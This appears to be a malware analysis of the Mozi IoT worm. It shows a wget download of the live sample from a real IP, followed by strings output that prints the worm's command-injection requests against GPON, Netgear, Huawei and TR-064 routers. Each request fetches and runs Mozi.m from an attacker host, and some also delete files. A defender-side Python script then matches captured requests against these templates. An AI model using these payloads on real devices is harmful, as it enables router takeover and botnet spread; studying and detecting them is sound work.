Sample: wget http://182.121.157.194:57811/Mozi.m
    Static analysis with the Linux file and strings utilities
    file Mozi.m
    Mozi.m: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
    This shows it is a 32-bit Linux executable, statically linked, with the symbol table stripped.
    strings Mozi.m
    JR*
    gfff
    gfff
    VUUUHY
    VUUU
    Qgfff
    >0@-
    gfff
    @ #!
    !1C “
    POST /cdn-cgi/
    HTTP/1.1
    User-Agent:
    Host:
    Cookie:
    http
    url=
    POST
    socket error
    error
    packet send2 error %d which means %s
    packet send error %d which means %s
    /var/
    .ipds
    .config
    %d.%d.%d.%d
    GET /c HTTP/1.0
    Host: %s
    %hhu.%hhu.%hhu.%hhu
    8.8.8.8 114.114.114.114
    /var/tmp/
    /var/run/
    /dev/shm/
    /proc/
    /usr/
    /mnt/
    /home/
    [cnc]
    [/cnc]
    %5hu
    HTTP/1.1
    Content-Length:
    Content-Type:
    GET %s HTTP/1.1
    Host: %s
    Connection: Keep-Alive
    Content-Type: application/octet-stream
    Referer: http://baidu.com/%s/%s/%d/%s/%s/%s/%s))
    GET %s HTTP/1.1
    Host: %s
    Connection: Keep-Alive
    Content-Type: application/octet-stream
    no aliases
    http://
    https://
    %lu.%lu.%lu.%lu
    (null)
    http://ipinfo.io/ip
    [dip]
    [/dip]
    7001
    POST /GponForm/diag_Form?images/ HTTP/1.1
    Host: 127.0.0.1:80
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    Accept:
    /
    User-Agent: Hello, World
    Content-Length: 118
    XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://%s:%d/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
    POST /picsdesc.xml HTTP/1.1
    Content-Length: 630
    Accept-Encoding: gzip, deflate
    SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
    Accept: /
    User-Agent: Hello-World
    Connection: keep-alive
    <?xml version="1.0" ?>47450TCP44382cd /var/; wget http://%s:%d/Mozi.m; chmod +x Mozi.m; ./Mozi.m1syncthing0
    GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/
    ;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
    GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
    POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
    Host: %s:37215
    Content-Length: 601
    Connection: keep-alive
    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
    <?xml version="1.0" ?>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)$(echo HUAWEIUPNP)
    POST /UD/act?1 HTTP/1.1
    Host: 127.0.0.1:7574
    User-Agent: Hello, world
    SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
    Content-Type: text/xml
    Content-Length: 640
    <?xml version="1.0"?><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&quot;>`cd /tmp && rm -rf
    && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064</NewNTPServer1><NewNTPServer2>echo DEATH</NewNTPServer2><NewNTPServer3>echo DEATH</NewNTPServer3><NewNTPServer4>echo DEATH</NewNTPServer4><NewNTPServer5>echo DEATH`
    POST /UD/act?1 HTTP/1.1
    Host: 127.0.0.1:5555
    User-Agent: Hello, world
    SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
    Content-Type: text/xml
    Content-Length: 640

    The worm's propagation process is roughly this: once it runs it obtains its IP, at the same time scans the broadcast IP range, and uses SOAP requests carrying router credentials to log in and spread the worm file... that is about it.
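As an added defender-side example (not part of the original post or the sample), the request templates visible in the strings output above can be turned into a triage check that tells which Mozi exploit template a captured HTTP request matches and whether it carries the Mozi.m dropper; the labels, helper names and sample captures are my own constructions.

```python
import re
from typing import Optional

# Markers lifted from the request templates in the strings output above. Each
# pattern identifies one device-specific template by its request line or
# SOAPAction header. The labels are my own.
TEMPLATE_MARKERS = [
    ("gpon_diag_form",        re.compile(r"^POST /GponForm/diag_Form", re.M)),
    ("upnp_add_port_mapping", re.compile(r"^SOAPAction:.*WANIPConnection:1#AddPortMapping", re.M)),
    ("netgear_setup_cgi",     re.compile(r"^GET /setup\.cgi\?next_file=netgear\.cfg&todo=syscmd", re.M)),
    ("huawei_device_upgrade", re.compile(r"^POST /ctrlt/DeviceUpgrade_1", re.M)),
    ("tr064_set_ntp_servers", re.compile(r"^SOAPAction:.*Time:1#SetNTPServers", re.M)),
]

# Dropper fingerprint shared by the templates: a wget for Mozi.m, or one of the
# scratch file names the templates write to under /tmp.
DROPPER_RE = re.compile(r"wget\b.*?Mozi\.m|/tmp/(?:gpon80|netgear|huawei|tr064)\b", re.S)


def classify_request(raw: str) -> Optional[dict]:
    """Return {'template': label, 'dropper': bool} for a matching raw request, else None."""
    for label, pattern in TEMPLATE_MARKERS:
        if pattern.search(raw):
            return {"template": label, "dropper": bool(DROPPER_RE.search(raw))}
    return None


def scan(captures: list) -> dict:
    """Count matched templates over a list of raw request captures (honeypot, proxy, pcap)."""
    counts: dict = {}
    for raw in captures:
        hit = classify_request(raw)
        if hit:
            counts[hit["template"]] = counts.get(hit["template"], 0) + 1
    return counts


# Constructed captures (not real traffic; 203.0.113.5 is a documentation address):
# one GPON template with the dropper, one TR-064 template without it, one benign request.
SAMPLE_CAPTURES = [
    "POST /GponForm/diag_Form?images/ HTTP/1.1\r\nHost: 127.0.0.1:80\r\n\r\n"
    "XWebPageName=diag&diag_action=ping&dest_host=``;wget+http://203.0.113.5:1234/Mozi.m+-O+->/tmp/gpon80&ipv=0",
    "POST /UD/act?1 HTTP/1.1\r\nSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\n\r\n"
    "<u:SetNTPServers>`cd /tmp && rm -rf *`</u:SetNTPServers>",
    "GET /index.html HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n",
]

if __name__ == "__main__":
    for raw in SAMPLE_CAPTURES:
        print(raw.splitlines()[0], "->", classify_request(raw))
    print(scan(SAMPLE_CAPTURES))
```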